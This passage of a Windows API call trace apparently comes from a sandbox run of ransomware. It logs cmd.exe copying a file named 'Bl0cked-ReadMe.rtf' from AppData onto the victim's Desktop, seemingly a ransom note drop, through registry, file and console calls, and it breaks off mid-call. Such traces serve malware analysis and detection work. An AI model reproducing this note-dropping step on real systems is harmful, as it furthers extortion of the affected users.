lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.150] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.173] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.173] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f734 | out: phkResult=0x26f734*=0x0) returned 0x2 [0220.173] VirtualQuery (in: lpAddress=0x26f76b, lpBuffer=0x26f704, dwLength=0x1c | out: lpBuffer=0x26f704*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.173] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f704, dwLength=0x1c | out: lpBuffer=0x26f704*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.173] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f704, dwLength=0x1c | out: lpBuffer=0x26f704*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.173] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f704, dwLength=0x1c | out: lpBuffer=0x26f704*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.173] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f704, dwLength=0x1c | out: lpBuffer=0x26f704*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0220.173] GetConsoleOutputCP () returned 0x1b5 [0220.175] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.175] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.175] _get_osfhandle (_FileHandle=1) returned 0x7 
[0220.175] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.176] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.176] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.177] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.177] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.178] GetEnvironmentStringsW () returned 0x320178* [0220.178] FreeEnvironmentStringsW (penv=0x320178) returned 1 [0220.178] GetEnvironmentStringsW () returned 0x320178* [0220.178] FreeEnvironmentStringsW (penv=0x320178) returned 1 [0220.178] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e6a4 | out: phkResult=0x26e6a4*=0x40) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x0, lpData=0x26e6b0*=0xa0, lpcbData=0x26e6a8*=0x1000) returned 0x2 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x1, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x0, lpData=0x26e6b0*=0x1, lpcbData=0x26e6a8*=0x1000) returned 0x2 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, 
lpData=0x26e6b0*=0x0, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x40, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x40, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x0, lpData=0x26e6b0*=0x40, lpcbData=0x26e6a8*=0x1000) returned 0x2 [0220.179] RegCloseKey (hKey=0x40) returned 0x0 [0220.179] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e6a4 | out: phkResult=0x26e6a4*=0x40) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x0, lpData=0x26e6b0*=0x40, lpcbData=0x26e6a8*=0x1000) returned 0x2 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x1, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x0, lpData=0x26e6b0*=0x1, lpcbData=0x26e6a8*=0x1000) returned 0x2 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x0, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] 
RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x9, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x9, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x0, lpData=0x26e6b0*=0x9, lpcbData=0x26e6a8*=0x1000) returned 0x2 [0220.179] RegCloseKey (hKey=0x40) returned 0x0 [0220.179] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.179] srand (_Seed=0x5b8863b6) [0220.179] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"" [0220.179] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"" [0220.179] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.180] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.180] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.180] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 
[0220.180] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.180] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.180] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.180] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.180] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.180] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.180] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.180] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.180] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.180] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.181] GetEnvironmentStringsW () returned 0x3222c8* [0220.181] FreeEnvironmentStringsW (penv=0x3222c8) returned 1 [0220.181] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.181] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.181] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.181] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.181] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.181] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.181] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.181] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.181] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.181] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.181] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f470 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.181] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, 
lpBuffer=0x26f470, lpFilePart=0x26f46c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f46c*="Desktop") returned 0x18 [0220.181] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.181] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f1ec | out: lpFindFileData=0x26f1ec) returned 0x320008 [0220.181] FindClose (in: hFindFile=0x320008 | out: hFindFile=0x320008) returned 1 [0220.182] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f1ec | out: lpFindFileData=0x26f1ec) returned 0x320008 [0220.182] FindClose (in: hFindFile=0x320008 | out: hFindFile=0x320008) returned 1 [0220.182] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f1ec | out: lpFindFileData=0x26f1ec) returned 0x320008 [0220.182] FindClose (in: hFindFile=0x320008 | out: hFindFile=0x320008) returned 1 [0220.182] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.182] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.182] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.182] GetEnvironmentStringsW () returned 0x322ae8* [0220.182] FreeEnvironmentStringsW (penv=0x322ae8) returned 1 [0220.182] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.183] GetConsoleOutputCP () returned 0x1b5 [0220.194] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.194] GetUserDefaultLCID () returned 0x409 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f5b0, cchData=128 | out: lpLCData="0") returned 2 [0220.195] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f5b0, cchData=128 | out: lpLCData="0") returned 2 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f5b0, cchData=128 | out: lpLCData="1") returned 2 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.196] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.197] GetConsoleTitleW (in: lpConsoleTitle=0x3108d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.201] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.201] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.202] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.202] GetProcAddress 
(hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.202] _wcsicmp (_String1="type", _String2=")") returned 75 [0220.203] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0220.203] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0220.203] _wcsicmp (_String1="IF", _String2="type") returned -11 [0220.203] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0220.203] _wcsicmp (_String1="REM", _String2="type") returned -2 [0220.203] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0220.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.207] GetFileType (hFile=0x7) returned 0x2 [0220.216] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.216] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f4a8 | out: lpMode=0x26f4a8) returned 1 [0220.220] _dup (_FileHandle=1) returned 3 [0220.220] _close (_FileHandle=1) returned 0 [0220.220] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0220.220] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f478, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0220.221] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0220.221] GetConsoleTitleW (in: lpConsoleTitle=0x26f2a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.222] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0220.222] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0220.222] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0220.222] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0220.222] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.222] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x26ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ee0c) returned 0x310e60 [0220.223] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0220.223] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0220.223] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0220.223] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26dd18, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0220.223] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0220.223] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.223] GetFileType (hFile=0x54) returned 0x1 [0220.223] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.223] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26dd70 | out: lpFileSizeHigh=0x26dd70*=0x0) returned 0x1632 [0220.223] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.223] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0220.223] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.223] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.223] GetFileType (hFile=0x4c) returned 0x1 [0220.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.223] 
GetFileType (hFile=0x4c) returned 0x1 [0220.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.224] GetFileType (hFile=0x4c) returned 0x1 [0220.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 
[0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.225] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.225] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, 
lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, 
lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.226] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.226] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | 